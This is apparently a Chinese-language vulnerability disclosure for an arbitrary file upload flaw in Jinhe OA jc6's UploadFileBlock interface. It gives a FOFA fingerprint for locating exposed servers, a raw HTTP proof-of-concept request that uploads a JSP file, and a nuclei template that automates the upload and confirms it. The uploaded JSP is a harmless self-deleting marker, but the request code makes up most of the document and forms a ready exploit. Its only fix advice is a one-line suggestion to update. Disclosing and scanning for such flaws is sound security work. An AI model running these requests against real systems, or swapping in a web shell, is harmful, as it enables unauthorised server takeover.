金和OA-jc6-UploadFileBlock任意文件上传漏洞
1.漏洞介绍
金和OA jc6系统UploadFileBlock接口处存在任意文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件,最终导致服务器失陷
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:body=“/jc6/platform/sys/login”
5.POC
POST /jc6/JHSoft.WCF/Attachment/UploadFileBlock HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="filename"; filename="ceshi.jsp"
<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
------WebKitFormBoundary5iALAXlSiqxJXrhK--
nuclei检测
id: jinhe-jc6-UploadFileBlock-fileupload
info:
name: 金和OA jc6系统UploadFileBlock接口处存在任意文件上传漏洞 恶意攻击者可能利用此漏洞上传恶意文件 最终导致服务器失陷
author: test
severity: high
metadata:
fofa: body="/jc6/platform/sys/login"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /jc6/JHSoft.WCF/Attachment/UploadFileBlock HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="filename"; filename="{{filename}}.jsp"
<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
------WebKitFormBoundary5iALAXlSiqxJXrhK--
- |
GET /jc6/upload/{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"Hello World!")
6.修复建议
更新到最新版本